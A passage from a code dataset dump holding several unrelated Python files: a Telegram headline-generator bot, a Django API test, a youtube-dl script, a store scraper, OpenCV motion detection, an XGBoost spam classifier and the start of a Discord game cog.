Random one\r\n keyboard.add(key_like, key_dis) # adding these buttons to be in one row\r\n key_more = types.InlineKeyboardButton(text='ещё', callback_data='escho') # adding button for creating new title\r\n keyboard.add(key_more) # adding this button\r\n return keyboard #\r\n\r\nkeyboard = init_keyb() # initializing keyboard for the first time\r\n\r\n\r\nadm_rep_kb = types.InlineKeyboardMarkup()\r\nkey_read = types.InlineKeyboardButton(text = 'прочитать след.', callback_data = 'read_rep')\r\nkey_repl = types.InlineKeyboardButton(text = 'Ответить', callback_data = 'reply_to_rep')\r\nadm_rep_kb.add(key_read, key_repl)\r\n\r\nkbkb = telebot.types.ReplyKeyboardMarkup(True)\r\nkbkb.row('/about', 'еще', '/report')\r\n\r\nis_closed = False\r\n\r\nif is_closed:\r\n @bot.message_handler(content_types=['text'])\r\n def busy_with_work(message):\r\n if message.text.lower() in ['бастуете', 'бастуете?', 'забастовка?', 'забастовка', 'бастуешь?']:\r\n bot.send_message(message.chat.id, 'Ну да, бастуем')\r\n else:\r\n bot.send_message(message.chat.id, 'Ведутся технические работы')\r\n\r\n\r\n\r\n@bot.message_handler(commands = ['start', 'about', 'info', 'report'])\r\ndef send_txt_file(message):\r\n global new_title\r\n global want_to_send_report\r\n global last_w_r\r\n if want_to_send_report:\r\n return\r\n if message.text.lower().startswith('/start'):\r\n bot.send_message(message.chat.id, 'Чтобы начать напиши мне любой текст или нажми кнопку <еще> под постом\\n\\nЕсли тебе понравится нейроновсть, то нажми левую кнопку(где будет что-то типа класс, гуд, оу и т.д.), А если нет - то на правую(где будет фу, бред и т. д.)\\n\\nЧтобы получить ещё одну новсть нажми на <ещё>', reply_markup = keyboard)\r\n with open('user_list.txt', 'r') as r_log_file:\r\n if message.from_user not in r_log_file:\r\n open('user_list.txt', 'a').write(f'{message.from_user}\\n\\n')\r\n elif message.text.lower().startswith('/report'):\r\n if len(message.text.split()) > 1:\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n report_data = [str(message.chat), str(datetime.datetime.now()), str(message.chat.id) + ';' + str(message.message_id), False]\r\n cursor.executemany('INSERT INTO reports VALUES (?, ?, ?, ?)', (report_data, ))\r\n bot.send_message(message.chat.id, 'Ваше заявление отправлено', reply_markup = kbkb)\r\n conn.commit()\r\n else:\r\n bot.send_message(message.chat.id, 'Пожалуйста отправьте сообщение, которое вы хотите передать админисратору. Я вас слушаю')\r\n want_to_send_report = True\r\n else:\r\n bot.send_message(message.chat.id, 'Этот бот генерирует заголовки новостей\\n\\nс переменным успехом, но все же\\n\\nЧтобы сгенерировать нейроновость воспользуйтесь кнопками под сообщением\\n\\nДля генерации по первым словам ставте «!» перед сообщением\\n\\nЕсли вы отправите десятичное число(например 0.54 или 3.72), то это изменит генерацию сообщений. 
Чем больше число, тем более абсурдный и неправдоподобный результат, чем меньше число - наоборот, новости более топорные\\n\\nДля связи с администрацией используйте /report и после пишете сообщение.\\nЛибо /report <Сообщение>', reply_markup = keyboard)\r\n new_title = ''\r\n\r\n\r\n@bot.message_handler(commands = ['file'])\r\ndef send_txt_file(message):\r\n global new_title\r\n global want_to_send_report\r\n if want_to_send_report == False:\r\n if message.chat.id == 504898099:\r\n if message.text.split()[1:] in os.listdir():\r\n bot.send_document(message.chat.id, open(message.text.split()[1:], 'r'))\r\n else:\r\n bot.send_document(message.chat.id, open('phrases_logs.txt', 'r'))\r\n new_title = ''\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef send_neuro_new(message):\r\n keyboard = init_keyb()\r\n global new_title\r\n global last_temp\r\n global last_key\r\n global last_w_r\r\n global want_to_send_report\r\n global want_to_rply\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n print(message.text)\r\n if want_to_send_report:\r\n report_data = [str(message.chat), str(datetime.datetime.now()), str(message.chat.id) + ';' + str(message.message_id), False]\r\n cursor.executemany('INSERT INTO reports VALUES (?, ?, ?, ?)', (report_data, ))\r\n bot.send_message(message.chat.id, 'Ваше заявление отправлено', reply_markup = kbkb)\r\n conn.commit()\r\n want_to_send_report = False\r\n return\r\n elif want_to_rply:\r\n bot.send_message(last_w_r[0], f'Вам пришел ответ от адмнистрации на сообщение от {last_w_r[1][:18]}:\\n' + message.text)\r\n bot.send_message(message.chat.id, 'Сообщение отправлено')\r\n want_to_rply = False\r\n return\r\n else:\r\n pass\r\n if message.text.lower() == 'новые сообщения' and message.chat.id == 504898099:\r\n cursor.execute('SELECT * FROM reports WHERE wtchd = FALSE')\r\n num_of_reps = 0\r\n new_reps = cursor.fetchall()\r\n for reprsrs in new_reps:\r\n num_of_reps += 1\r\n bot.send_message(message.chat.id, f'У вас есть [{num_of_reps}] нов. 
сообщений', reply_markup = adm_rep_kb)\r\n return\r\n elif message.text.lower() == 'пользователи' and message.chat.id == 504898099:\r\n bot.send_document(message.chat.id, open('user_list.txt', 'r'), caption = 'Файл, со всеми пользователями, нажавшими старт')\r\n return\r\n try:\r\n last_temp = float(message.text)\r\n new_title = generate_text(model, start_string=f\"♣{last_key}\", temper = float(message.text))\r\n except ValueError:\r\n if message.text.startswith('!'):\r\n last_key = message.text[1:]\r\n if 'Й' in message.text:\r\n message.text.replace('Й', 'й')\r\n if message.text.startswith('!Й'):\r\n new_title = generate_text(model, start_string=f\"♣{message.text.replace('!', '♣').replace('Й', 'й')}\")\r\n new_title = '♣' + 'Й' + new_title.replace('♣', '')[1:]\r\n else:\r\n new_title = generate_text(model, start_string=f\"♣{last_key}\")\r\n else:\r\n new_title = generate_text(model, start_string=\"♣\")\r\n last_key = ''\r\n bot.send_message(message.chat.id, new_title.replace('♣', '').replace('₪', ''), reply_markup=keyboard)\r\n with open('phrases_logs.txt', 'a') as log_file:\r\n log_file.write(f'{new_title} [{last_temp}]\\n\\n')\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef callback_worker(call):\r\n keyboard = init_keyb()\r\n global new_title\r\n global last_temp\r\n global want_to_rply\r\n global last_w_r\r\n if call.data == \"escho\":\r\n new_title = generate_text(model, start_string=u\"♣\", temper = last_temp)\r\n bot.send_message(call.message.chat.id, new_title.replace('♣', '').replace('₪', ''), reply_markup=keyboard)\r\n print(call.message.text)\r\n print(last_temp)\r\n with open('phrases_logs.txt', 'a') as log_file:\r\n log_file.write(f'{new_title} [{last_temp}]\\n\\n')\r\n elif call.data == \"like\":\r\n if new_title:\r\n with open('new_tutby_titles.txt', 'a') as sess_file:\r\n sess_file.write(f'{new_title}\\n\\n')\r\n bot.send_message(call.message.chat.id, 'Ок', reply_markup=keyboard)\r\n new_title = ''\r\n else:\r\n bot.send_message(call.message.chat.id, 'Нечего учитывать', reply_markup = keyboard)\r\n elif call.data == \"bad\":\r\n if new_title:\r\n with open('bad_tutby_titles.txt', 'a') as sess_file:\r\n sess_file.write(f'{new_title}\\n\\n')\r\n bot.send_message(call.message.chat.id, 'Такое больше не повторится(надеюсь)', reply_markup=keyboard)\r\n new_title = ''\r\n else:\r\n bot.send_message(call.message.chat.id, 'Нечего учитывать', reply_markup = keyboard)\r\n elif call.data == 'read_rep':\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM reports WHERE wtchd = FALSE')\r\n new_reps = cursor.fetchone()\r\n if not new_reps:\r\n bot.send_message(call.message.chat.id, 'Сообщения закончились')\r\n else:\r\n reporrt = new_reps\r\n report_fn = reporrt[0].split(',')[4].replace(\"'\", \"\").replace('first_name: ', '')\r\n report_un = reporrt[0].split(',')[3].replace(\"'\", \"\").replace('username: ', '')\r\n bot.forward_message(call.message.chat.id, reporrt[2].split(';')[0], reporrt[2].split(';')[1])\r\n bot.send_message(call.message.chat.id, f\"\"\"Получено от {report_fn} {report_un}\\nв {reporrt[1][:18]}\"\"\", reply_markup = adm_rep_kb)\r\n last_w_r = reporrt[2].split(';')\r\n cursor.execute(f'UPDATE reports SET wtchd = TRUE WHERE message_id = ?', (reporrt[2], ))\r\n conn.commit()\r\n elif call.data == 'reply_to_rep':\r\n bot.send_message(call.message.chat.id, 'Я тея слушаю')\r\n want_to_rply = True\r\n\r\nbot.polling()\r\n", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", 
"file_size_in_byte": 16621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorShape", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 147, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 151, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 180, "usage_type": "call"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 183, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 183, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 187, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 204, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 204, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 205, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 205, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 205, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 206, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 206, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 210, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 210, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 217, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 217, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 218, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 218, "usage_type": "name"}, {"api_name": 
"telebot.types.InlineKeyboardButton", "line_number": 219, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 219, "usage_type": "name"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 222, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 222, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 251, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 253, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 253, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 271, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 366, "usage_type": "call"}]}
+{"seq_id": "134170450", "text": "from rest_framework import status\n\nimport ozpcenter.model_access as generic_model_access\nfrom ozpcenter.scripts import sample_data_generator as data_gen\nfrom tests.ozp.cases import APITestCase\n\n\nclass RootViewApiTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n data_gen.run()\n\n def setUp(self):\n pass\n\n def test_hal_struct(self):\n user = generic_model_access.get_profile('wsmith').user\n self.client.force_authenticate(user=user)\n url = '/iwc-api/'\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue('_links' in response.data)\n self.assertTrue('_embedded' in response.data)\n\n self.assertTrue('ozp:application' in response.data['_links'])\n self.assertTrue('/self/application/' in response.data['_links']['ozp:application']['href'])\n\n self.assertTrue('ozp:system' in response.data['_links'])\n self.assertTrue('ozp:user' in response.data['_links'])\n self.assertTrue('ozp:intent' in response.data['_links'])\n self.assertTrue('ozp:user-data' in response.data['_links'])\n", "sub_path": "tests/ozpiwc/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tests.ozp.cases.APITestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "ozpcenter.scripts.sample_data_generator.run", "line_number": 12, "usage_type": "call"}, {"api_name": "ozpcenter.scripts.sample_data_generator", "line_number": 12, "usage_type": "name"}, {"api_name": "ozpcenter.model_access.get_profile", "line_number": 18, "usage_type": "call"}, {"api_name": "ozpcenter.model_access", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "520373325", "text": "from __future__ import unicode_literals\nimport youtube_dl\n\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\nif __name__ == \"__main__\":\n link = input()\n print(\"Enter the link to the video, whose audio you want to download\")\n youtube_dl.YoutubeDL(ydl_opts).download(link)", "sub_path": "Python/Youtube/YoutubeMP3Download.py", "file_name": "YoutubeMP3Download.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "youtube_dl.YoutubeDL", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "582549886", "text": "import sys\nimport random\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport requests\nimport os\n\ndef main():\n getpage()\n #print(\"hello\")\n\ndef getpage():\n\n r = requests.get('https://ksp.co.il/?select=.1027..2..42..4039.&kg=&list=1&sort=2&glist=1&uin=0&txt_search=&buy=&minprice=0&maxprice=0&intersect=&rintersect=&store_real=')\n #print(type(r.text))\n cardlist=printstuff(r.text)\n ##print(cardlist)\n fixed=fixlist(cardlist)\n #print(fixed)\n\n ##print(\"first list len\"+str(len(cardlist)))\n #print(\"secend list len\"+str(len(fixed)))\n #printlist(fixed)\n # print(\"\")\n # print(\"\")\n # print(\"\")\n #printlist(fixed)\n fixed=fixlistb(fixed)\n # print(\"\")\n # print(\"\")\n # print(\"\")\n #printlist(fixed)\n #print(\"can I buy the cpu I want (5600)in ksp:\"+str(upgeade(fixed)))\n #os.system('cls')\n #os.system('clear')\n #printlist(fixlistb(fixed))\n #print(r.text.decode('UTF-8'))\n return fixed \n\ndef upgeade(a):\n ret=False\n for i in a:\n if(i.find(\"5600\")!=-1):\n ret=True\n return ret\n\ndef printlist(a):\n for i in a:\n print(i)\n\ndef fixlistb(a):\n for i in range(len(a)):\n a[i]=a[i][5:]\n return a \n\ndef fixlist(a):\n b=[]\n b.append(a[0])\n add=True\n for i in range(len(a)):\n add=True\n for j in range(len(b)):\n if(b[j].find(a[i][:len(a[i])-7])!=-1):\n add=False\n \n if(add):\n b.append(a[i])\n return b\n \n\n\n\n \ndef printstuff(r):\n l=r.find(\"AMD\")\n ret=[]\n while(l!=-1):\n a=r[l:].find(\"<\")\n b=l\n while(r[b]!=\"<\"):\n b=b-1\n #print(r[l-b:l+a])\n gpu=r[l-30:l+a]\n if(gpu.find(\"Box\")!=-1):\n #print(r[l-20:l+a])\n #print(\"the > if in:\"+str(gpu.find(\">\")))\n while(gpu.find(\">\")!=-1):\n gpu=gpu[gpu.find(\">\")+1:]\n #print(gpu)\n ret.append(gpu)\n \n r=r[l+20:]\n l=r.find(\"AMD\")\n return ret\n\ndef openbrowser():\n print(\"\")\n #browser = webdriver.Chrome(ChromeDriverManager().install())\n #browser.get('https://ksp.co.il/index.php?select=.35.&kg=&list=1&sort=1&glist=1&uin=0&txt_search=rtx&buy=&minprice=0&maxprice=0&intersect=&rintersect=&store_real=')\n\n \n\nmain()", "sub_path": "botprosesors.py", "file_name": "botprosesors.py", "file_ext": "py", "file_size_in_byte": 2340, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "473530232", "text": "import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture(0);\nret, frame = cap.read();\navgframe = np.float32(frame);\n\n\nopening_kernel = np.ones((13,13),np.uint8);\n\ncv.namedWindow(\"End product\");\nwhile True:\n ret,frame = cap.read();\n # real time frame\n #cv.imshow(\"Ori frame\",frame);\n #the smaller the alpha, the slower the better\n cv.accumulateWeighted(frame,avgframe,0.25);\n resframe = cv.convertScaleAbs(avgframe);\n #calculate background from the real time frame\n #cv.imshow(\"Background frame\", resframe);\n\n #seperate background and foreground\n difframe = cv.absdiff(frame,resframe);\n #cv.imshow(\"Diff frame\",difframe);\n\n #convert the abs diff image into greyscale\n greydifframe = cv.cvtColor(difframe,cv.COLOR_BGR2GRAY);\n #cv.imshow(\"Gray diff frame\",greydifframe);\n \n #(ksizewidth,ksizeheight) needs to be odd number,\n #the bigger the value, the blurrer it is\n blurdiff = cv.GaussianBlur(greydifframe,(21,21),0);\n #cv.imshow(\"Blur diff frame\",blurdiff);\n _,thresdiff = cv.threshold(blurdiff,15,255,cv.THRESH_BINARY);\n dilateddiff = cv.dilate(thresdiff, None, iterations=20);\n openeddiff = cv.morphologyEx(thresdiff,cv.MORPH_OPEN,opening_kernel);\n _, contours, _ = cv.findContours(dilateddiff, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE);\n #contours, _ = cv.findContours(dilateddiff, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE);\n cv.imshow(\"After procs Diff\",dilateddiff);\n #cv.drawContours(frame, contours, -1, (0,255,0), 2);\n \n\n #end product\n #'''\n rect_cont = [];\n for c in contours:\n rect_cont.append(cv.contourArea(c));\n if (len(rect_cont) != 0 and len(rect_cont) >= 5):\n rect_cont.sort();\n mid_area = rect_cont[int(len(rect_cont)*2/3)];\n else:\n mid_area = 0;\n for c in contours:\n (x,y,w,h) = cv.boundingRect(c);\n if (cv.contourArea(c) >= mid_area):\n cv.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2);\n #'''\n cv.imshow(\"End product\",frame);\n \n key = cv.waitKey(1);\n if key==ord(\"q\"):\n break\n\ncv.destroyAllWindows();\ncap.release();\n", "sub_path": "MotionDetection2.py", "file_name": "MotionDetection2.py", "file_ext": "py", "file_size_in_byte": 2127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.accumulateWeighted", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.convertScaleAbs", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.absdiff", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 37, "usage_type": "call"}, {"api_name": 
"cv2.RETR_TREE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "14912791", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.path import Path\n\nclass StrokesPath(Path):\n # input should be a single drawing of size Ns * 3\n # remember to convert the 5 hot to 3 hot\n def __init__(self, data, scale=1, *args, **kwargs):\n vertices = np.asarray(data)\n vertices = np.cumsum(vertices[:, :-1], axis=0) * scale\n self.min_x = np.min(vertices[:, 0])\n self.max_x = np.max(vertices[:, 0])\n self.min_y = np.min(vertices[:, 1])\n self.max_y = np.max(vertices[:, 1])\n codes = np.append([1], data[:-1, -1])\n codes = self.to_code(codes.astype(int))\n super(StrokesPath, self).__init__(vertices.astype(int), codes, *args, **kwargs)\n \n @staticmethod\n def to_code(cmd):\n return Path.LINETO - cmd\n\n# change trained data into drawable data\n# data should be of size Nmax * 5\ndef to_drawable(data):\n ns = 0\n data = np.asarray(data)\n for i in range(data.shape[0]):\n if data[i, 2] == 0 and data[i, 3] == 0 and data[i, 4] == 1:\n ns = i\n break\n\n meaningful_data = data[:ns + 1, (0, 1, 3)]\n return meaningful_data\n", "sub_path": "tools/drawer.py", "file_name": "drawer.py", "file_ext": "py", "file_size_in_byte": 1075, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.path.Path", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.path.Path.LINETO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.path.Path", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "31497832", "text": "from sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost import plot_importance\nfrom matplotlib import pyplot as plt\ndef tokenizer_space(line):\n # 按空格分词\n return [li for li in line.split() if li.strip() != '']\n \n \n#训练样本的tf-idf的生成\ndef get_data_tf_idf(train_text):\n #tokenizer=tokenizer_space表示使用上面的tikenizer_space完成分词任务\n vectoring = TfidfVectorizer(input='content', tokenizer=tokenizer_space, analyzer='word')\n content = open(train_text, 'r', encoding='utf8').readlines()\n x = vectoring.fit_transform(content)\n return x, vectoring\n\n#测试样本的tf-idf的生成 \ndef get_test_data_tf_idf(train_text,test_text):\n vectoring = TfidfVectorizer(input='content', tokenizer=tokenizer_space, analyzer='word')\n content = open(train_text, 'r', encoding='utf8').readlines()\n content1 = open(test_text, 'r', encoding='utf8').readlines()\n x_train = vectoring.fit_transform(content)\n x_test = vectoring.transform(content1)\n return x_test, vectoring\n\n#获取样本的标签\ndef get_label_list(label_file_name):\n with open(label_file_name, 'r', encoding='utf8') as f:\n lebel_list=[]\n for line in f:\n lebel_list.append(line[0])\n return np.array(lebel_list)\ntrain_text = 'email.txt'\ntrain_labels = 'labels.txt'\n\n\nx, vectoring = get_data_tf_idf(train_text)\n\ny = get_label_list(train_labels)\n\n\n#样本打乱\nindex = np.arange(len(y)) \nnp.random.shuffle(index)\nx = x[index]\ny = y[index]\n\n#8:2划分训练集和测试集\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\n\nmodel=XGBClassifier() \n \nmodel.fit(x_train, y_train) \npred =model.predict(x_test)#预测测试集数据\nprint('classification_report\\n', metrics.classification_report(y_test, pred, digits=4))\nprint('Accuracy:', metrics.accuracy_score(y_test, pred))\n\ntest_text='sms_spam/sms_test.txt'\ntest_x, test_vectoring = get_test_data_tf_idf(train_text,test_text)\npred = model.predict(test_x)\nlines = []\n\nfor idx,value in enumerate(pred):\n line = '%s,%s\\n'%(idx+1,value)\n lines.append(line)\n\nwith open('key33.csv', 'w') as f:\n f.writelines(lines)\n#判断哪个特征对构建决策树最有价值 \nplot_importance(model)\nplt.show()\n", "sub_path": "xgboost/xgboost/xgboost_run.py", "file_name": "xgboost_run.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 55, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 63, "usage_type": "call"}, {"api_name": 
"sklearn.metrics", "line_number": 63, "usage_type": "name"}, {"api_name": "xgboost.plot_importance", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]}
+{"seq_id": "405166479", "text": "from discord.ext import commands\r\nfrom .economy import NoAccount\r\nfrom __main__ import send_cmd_help\r\nfrom .utils import checks\r\nfrom random import randint\r\nimport os\r\nimport time\r\nimport random\r\nimport asyncio\r\nimport discord\r\n\r\nclass Arena:\r\n \"\"\"Allows up to 1 players to play Arena Games\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n def enough_points(self, uid, amount):\r\n bank = self.bot.get_cog('Economy').bank\r\n if bank.can_spend(uid, amount):\r\n return True\r\n else:\r\n return False\r\n \r\n def account_check(self, speaker):\r\n bank = self.bot.get_cog('Economy').bank\r\n if bank.account_exists(speaker):\r\n return True\r\n else:\r\n return False\r\n \r\n def roleCheck(self, user : discord.User):\r\n Roles = user.roles\r\n for Role in Roles[:]:\r\n if Role.id == \"220712429636681728\": #Copper\r\n return 2\r\n elif Role.id == \"220712465866948610\": #Iron\r\n return 3\r\n elif Role.id == \"220712513484881921\": #Silver\r\n return 4\r\n elif Role.id == \"220712535861493760\": #Gold\r\n return 5\r\n elif str(Role.id) == \"220712555650351114\": #Platinum\r\n return 6\r\n elif Role.id == \"220712579587112960\": #Mythril\r\n return 7\r\n elif Role.id == \"220712606145576960\": #Orichalcum\r\n return 8\r\n elif Role.id == \"220712680728559616\": #Adamantite\r\n return 9\r\n elif Role.id == \"223488592486334465\": #Hero\r\n return 10\r\n elif Role.id == \"220756096086704129\": #God\r\n return 100\r\n else:\r\n pass\r\n return 1 #unranked\r\n \r\n def roleNameCheck(self, Number):\r\n if Number == 1:\r\n return \"Unranked\"\r\n elif Number == 2:\r\n return \"Copper\"\r\n elif Number == 3:\r\n return \"Iron\"\r\n elif Number == 4:\r\n return \"Silver\"\r\n elif Number == 5:\r\n return \"Gold\"\r\n elif Number == 6:\r\n return \"Platinum\"\r\n elif Number == 7:\r\n return \"Mythril\"\r\n elif Number == 8: \r\n return \"Orichalcum\"\r\n elif Number == 9:\r\n return \"Adamantite\"\r\n elif Number == 10:\r\n return \"Hero\"\r\n elif Number == 100:\r\n return \"God\"\r\n else:\r\n return \"Unranked\"\r\n 